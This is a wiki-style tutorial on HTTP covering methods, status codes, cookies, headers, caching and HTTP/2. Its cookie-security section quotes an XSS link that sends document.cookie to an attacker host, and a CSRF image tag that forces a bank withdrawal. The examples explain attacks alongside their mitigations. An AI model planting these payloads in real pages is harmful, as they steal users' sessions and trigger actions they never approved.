wiki · home


HTTP

Hypertext Transfer Protocol (HTTP) is one of the most famous application protocols on the Internet. To read this document you most likely have made a few HTTP requests in order to fetch this document. It functions as a request-response protocol where clients interact with servers. The most common example of such interaction is between a browser and an application hosted in some machine. When the user types some address such as http://example.com, an HTTP request is made1 by the client (browser) to the server (application). The server will process the request and return a response to the client, which may contain information about the status of the request (success or failure, for example), and may also contain some content if it was requested.

Request methods

The request methods that a client can issue to a server are:

PUT and POST look very similar but they are not the same thing. The difference between them is that when using POST, the client is letting the server decide (according to the resource’s semantics) where the new entity should be created. While when using PUT, the client is expressing exactly which URI should be used for the enclosing resource in the request.

For example, a POST request could be made as the following:

POST /items

And the semantics for items would then be used to process the request and the item information passed in the message payload. This could, for example, result in a new item created at /items/13. A new and identical request could then result in a new item being created at /items/14.

On the other hand, a PUT request as the following:

PUT /items/11

The above request, can only modify the resource located at the specified URI. In this case, if there’s already an existing resource there, it would be modified with the information given in the message payload. If there isn’t a resource at that location, a new one would be created at that URI. A new and identical request would only then modify the existing resource2 and not create a new one as the POST example did.

Status codes

Every HTTP response must include the status code indicating the result of the request. The statuses are divided into five categories:

Category Description
1xx (Informational) The request was received, continuing process
2xx (Successful) The request was successfully received, understood, and accepted
3xx (Redirection) Further action needs to be taken in order to complete the request
4xx (Client Error) The request contains bad syntax or cannot be fulfilled
5xx (Server Error) The server failed to fulfill an apparently valid request

The list below presents some of the most common used status codes:

Persistent connections

In HTTP/0.9 and HTTP/1.0, the connection is closed after the server sends the response. In HTTP/1.1, a keep-alive mechanims was introduced, so the server must keep the connection up for more than a single pair of request/response.

A clear improvement gained with this mechanism was the reduced latency, since there is no need to do the TCP handshake again to setup a new connection. Another benefit of keeping the connection alive is the fact that the rate of transmitted segments increase as the time passes, as it was explained in this text in the TCP section about congestion control.

Session State

HTTP is a stateless protocol, meaning that the server does not retain information or status about each user during the course of multiple request/response pairs. To surpass this problem, web applications generally tend to use HTTP cookies as a way of storing and managing state during the request/response cycle.

HTTP Cookies

HTTP Cookies are small pieces of data that the server instruct the client to save it, to then be able to include these cookies in any future requests. The way a server sends this information is by using the Set-Cookie header as follows:

HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: theme=light

And the client would include this cookie in a future request as follows:

GET /info HTTP/1.1
Host: www.example.org
Cookie: theme=light

Cookies can have other attributes besides their name and value. These attributes are:

Security with Cookies

Cookies are sent at every request and they are not encrypted, so any attacker could simply steal the cookies by silently listening to the network. If a secure channel is used between client and server, this issue would be resolved, but unfortunately that is not the only security issue that you need to be aware when dealing with cookies.

XSS (Cross-site scripting) is a technique that can be used to steal cookies from a different domain. In this attack, the attacker would take advantage of a user’s trust in a certain website, for example, a well known forum website, and place a malicious piece of code such as:

<a href="#" onclick="window.location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>

In this case, when visiting the forum and clicking on this link3, the cookies for the current website would be sent to the attacker’s domain.

To mitigate this problem, the HttpOnly attribute can be used so that the cookies would not be accessed through JavaScript. An even better solution is to simply not allow users to submit malicious code such as the example above. In a forum website, for example, the users’ messages would be treated as unsafe and escaped accordingly to prevent malicious users from entering malicious strings in their messages.

Cross-site request forgery (CSRF) is another technique that can be used in conjunction with cookies to exploit a user. In CSRF, the attacker exploits the trust the user has in his browser, and forges a request that will be made by the browser on the user’s behalf. For example, an attacker could place this piece of code as a message in a forum website:

<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">

Assuming the user, Bob, is signed in the bank website, and the bank uses cookies to authenticate the user, the code above would issue a request to the bank website along with the cookies for that website, and if the bank doesn’t have any other authentication steps, the action in question would be executed without the user even knowing.

This type of attack cannot be mitigated with the HttpOnly attribute, but as with XSS, filtering the input would help. Another common technique to mitigate this type of attack is by using a token, usually called CSRF token, as a hidden input field in a form. This way, when any action is performed, the website can check the presence and validity of the token before processing the request.

Headers

Every HTTP request and response can include several header fields to include more information about the request context, or the response itself.

Request fields

Some of the most common header fields in a request are the following:

Header field name Description Example
Accept Content-Types that are acceptable for the response. Accept: text/plain
Accept-Charset Character sets that are acceptable for the response. Accept-Charset: utf-8
Accept-Encoding List of acceptable encodings. Accept-Encoding: gzip, deflate
Accept-Language List of human languages that are acceptable for the response. Accept-Language: en-US, pt-BR
Cache-Control Used to specify directives that must be obeyed by caches along the request-response chain. Cache-Control: no-cache
Connection Control options for the current connection. Connection: keep-alive
Cookie An HTTP Cookie previously sent by the server. Cookie: theme=light; session_id=32
Content-Length The length of the request in octets Content-Length: 348
Content-Type The MIME type of the body of the request (used with POST and PUT requests) Content-Type: multipart/form-data
Host The domain name of the server (for virtual hosting), and the TCP port on which the server is listening. Host: en.wikipedia.org:8080
If-Match Only perform the action if the client supplied entity matches the same entity on the server. If-Match: "737060cd8c284d8af7ad3082f209582d"
If-Modified-Since If the resource has not been modified since the specified date, a 304 Not Modified response is returned. Otherwise the server needs to transfer the new representation. If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT
If-None-Match Similar to the field above, but in this case the value is an ETag. If-None-Match: "737060cd8c284d8af7ad3082f209582d"
User-Agent The user agent string of the user agent. Googlebot/2.1 (+http://www.google.com/bot.html)

Response fields

Some of the most common header fields in a response are the following:

Header field name Description Example
Age The age the object has been in a proxy cache in seconds. Age: 74505
Cache-Control Used to specify directives that must be obeyed by caches along the request-response chain. Cache-Control: max-age=3600
Connection Control options for the current connection. Connection: close
Content-Encoding The type of encoding used in the data. Content-Encoding: gzip
Content-Language The natural language of the intended audience for the representation. Content-Language: pt-BR
Content-Length The length of the response body in octets. Content-Length: 26996
Content-Type The MIME type of the content. Content-Type: text/html; charset=utf-8
ETag An identifier for a specific version of a resource, often a message digest. ETag: "737060cd8c284d8af7ad3082f209582d"
Expires Gives the date/time after which the response is considered stale. Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified The last modified date for the requested object. Wed, 28 Sep 2016 02:28:20 GMT
Location Used in redirection, or when a new resource has been created (see 303 status code). Location: http://www.w3.org/pub/WWW/People.html
Server A name for the server. Server: Apache/2.4.1 (Unix)
Set-Cookie An HTTP Cookie. Set-Cookie: UserID=JohnDoe; Max-Age=3600; Version=1

HTTP Caching

HTTP Caching can be done in a couple of ways using different header fields for the desired cache strategy.

Expiration

The server can control the cache policy used by caching mechanisms along the request/response cycle. The Cache-Control header field is used for this purpose. It supports many directives, such as the following:

The client can also specify rules using Cache-Control directives. In this case, it instructs caches along the way, what the client is willing to accept as a valid response. For example, if a client issues a request with Cache-Control: max-age=60, it means that it will accept any response that its Age is no greater than 60 seconds.

Validation

ETags can be used to validate if cached responses are still fresh. A client can send a request to the server with the If-None-Match header value of an ETag that was sent by the server in a previous response. The server when receiving this request can check the resource has not been modified by comparing the ETag values and if they are the same it can simply return a 304 Not Modified response, which won’t have any payload data for the resource since the copy the client has is still valid, saving time and bandwidth.

Another way to check if a cached response is still fresh is done by using the If-Modified-Since header. In this case, the client makes a request with the date the resource was Last-Modified and the same mechanism used with ETags is done here, if there wasn’t any changes, a 304 Not Modified is returned, otherwise, the new resource data is sent.

Message Format

Clients and servers communicate by sending plain-text messages.

Request message

The syntax for the request message is:

A simplified example of a request is the following:

POST /profile HTTP/1.1
Host: some-host.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8,pt;q=0.6
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

user=jovem&age=21

Response message

The syntax for the response message is:

A simplified example of a request is the following:

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.google.com.br/index.html?gfe_rd=cr&ei=3oPtV-_QLIeq8wfS74LoAw
Content-Length: 272
Date: Thu, 29 Sep 2016 21:13:02 GMT

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com.br/index.html?gfe_rd=cr&amp;ei=3oPtV-_QLIeq8wfS74LoAw">here</A>.
</BODY></HTML>

HTTP/2

HTTP/2 is the new version of the protocol, intended to improve transport performance and enabling both lower latency and higher throughput. Applications are not required to perform semantic changes since the protocol keeps compatibility with several of HTTP/1.1 core concepts, such as methods, status codes, header fields, etc. Servers are the piece that require changes in order to understand and serve content via HTTP/2.

Optimization in HTTP/1.1

Most of the optimization techniques used in HTTP/1.1 revolved around minimizing the number of HTTP requests to the end server. A browser usually opens only 6 TCP connections to the same domain, and downloading assets can become a serial process, so some people started sharding their domains, so the browser would open X number of connections for each of those domains. Another trick used was to combine several assets into a single file; e.g., image spriting, and asset concatenation. Inlining is another trick used to avoid sending individual images, and thus requiring new requests to be made. With inlining, the resource is embedded in the document itself.

HTTP/2 design

HTTP/2 was designed to enable a more efficient usage of network resources, and several of the techniques presented above simply don’t need to be done when using HTTP/2 because it naturally supports the use cases for which the above techniques were hacked created.

A common problem with HTTP/1.1 is what is called head-of-line blocking. With HTTP pipelining, the client could dispatch several requests to the server but the server was only allowed to send back one response at a time, meaning that if the first request took long enough to have a response generated, the response for the others would be blocked.

The model used in HTTP/2 removes this limitation, enabling full request and response multiplexing in a single TCP connection. This is possible because client and server, break an HTTP request (or response) into independent frames that can be interleaved when transmitted, and are reassembled before delivering it to the application for processing.

Before we continue to explain how HTTP/2 actually works, let’s first define some terms that will be used in the rest of this section. First, HTTP/2 is a binary protocol. This means that everything sent and received, is in binary format, not in plain-text like HTTP/1.x used to be. Now, let’s get to the terms:

There are some important details to keep in mind:

Request and Response Multiplexing

In HTTP/1.x, if the client wanted to make multiple parallel requests to the server, the client needed to use multiple TCP connections. In HTTP/2, with the binary frame model this is not required anymore. Multiple requests (and responses) can be issued in a single TCP connection, and their frames can be interleaved, and reassembled at the other end.

INSERT INTERLEAVE IMAGE

The image above illustrates this feature. Multiple streams are being transmitted over the same connection, representing different responses and requests. This ability of multiplexing requests and responses bring several benefits, including:

If you are familiar with the congestion control mechanisms used by TCP, you will recognize that by using a single connection, these mechanisms will be better explored by HTTP/2. Contrast with the workaround in HTTP/1.x, where a client opened multiple TCP connections at a time, in this case, the connections could cause a congestion in the network because each connection would operate on its own state of congestion control, not knowing that the same origin is sending much more packets than each connection thinks it is.

Stream Priority

A client can assign a priority for a new stream by including the prioritization information (weight) in the HEADERS frame. The client can also mark some streams as dependent on others, creating a sort of “prioritization tree”. The server can take into consideration this prioritization information in order to allocate resources when managing concurrent streams.

The stream identified by * is called an implicit stream. Any stream that does not depend on any other stream has a dependency on this implicit (and non-existent) stream that is used as the root of the tree.

In (A) you have two streams that are independent but have different weights. The way the server allocates resources for them is by dividing the stream weight by the sum of weights of all siblings. So, in this case, this would be:

This means that stream A would get 75% of resources while stream B would get 25%. Applying the same rule in (D), results in both streams E and C receiving 50% of resources.

The prioritization information should be only thought as a suggestion of what is more important, it is not a guarantee that processing or transmitting a frame with a higher priority will happen before another frame with lower priority. For example, in (B) the client is indicating that stream C depends on stream D and the resources should be allocated first for stream D, and then for stream C. But that is only a suggestion, it doesn’t guarantee that stream D will receive full allocation before stream C gets some.

Clients can improve their performance by using this feature. Imagine a browser requesting a page, the document can be marked with higher priority than other resources, and remaining resources can be requested with priorities relative to their position in the document itself, so images at the bottom of a page could have lower priority than other elements that are located higher in the document.

This prioritization is also dynamic, meaning that the client can change it at any time by sending a PRIORITY frame indicating the new information.

Header compression

In HTTP/1.x the header fields are exchanged in plain-text, adding quite a bit of overhead per transfer. To reduce the overhead of data transferred just for the headers, HTTP/2 compress request and response headers metadata with a compression format called HPACK.

HPACK uses Huffman coding to compress the fields. A further optimization is done by maintaining a static and dynamic table with HTTP header fields that are referenced by the frames. Each side maintain both tables, the static table is defined in the protocol specification and contains common header fields that are very likely to be used by all connections, and the dynamic table, initially empty, is updated as client and server transmit frames.

When a header field is present in the static table, the frame can simply reference it by using the correspondent index of the field in the table. If the field is not present in the static table, the first request will send the compressed field, and that field will be inserted in the dynamic table. Then, any future request using the same field, won’t need to re-transmit it, it can simply send the correspondent index, reducing the size of requests/responses.

Flow Control

Similar to TCP, HTTP/2 also provides flow control. This is helpful so that different streams in the same connection do not destructively interfere with each other. Flow control in HTTP/2 is used for both individual streams and for the connection as a whole. The characteristics of flow control in HTTP/2 are:

An example of flow control usage would be a server sitting between the client and a web application that is experiencing problems and cannot process a lot of data at the moment. The server could either buffer a lot of data coming from the client, or simply tell the client to stop (or slow down) sending data, using the flow control mechanism present in HTTP/2.

An example of a client using flow control would be a browser displaying a page with a video where the user pauses the video, or switches to another tab. In this case, the browser could change its window size by sending a WINDOW_UPDATE frame, to inform the server it does not need to send a lot of data because the browser doesn’t want to buffer this data since the user is not even consuming it. Later, when resuming the video, the browser could update again the window size, and the server could start sending more data.

Server Push

HTTP/2 allows servers to send multiple responses to a client in association with an original request. For example, the client requests a document /index.html, and the server knows that the client will also need logo.png, style.css, etc. Before waiting the client to issue requests for these resources, the server can send the response immediately to the client.

The way this works is that the server will send a PUSH_PROMISE frame that identifies the original request that caused the server to initiate the push, along with other information such as the path of the resource, so the client knows it doesn’t need to request that resource again, etc. After the PUSH_PROMISE is sent, the server may send the actual data for the resource it promised.

The following list presents some characteristics about pushed resources:

Another important characteristic is that the server must be authoritative for the resource it is trying to send.

References

Notes


  1. Assuming DNS resolution for the domain in question.↩︎

  2. Because the request is identical it would not modify the resource, since the information is the same. Unless some other request has been made between the two.↩︎

  3. The attacker could also simply add a script tag with malicious code to send the user’s cookies.↩︎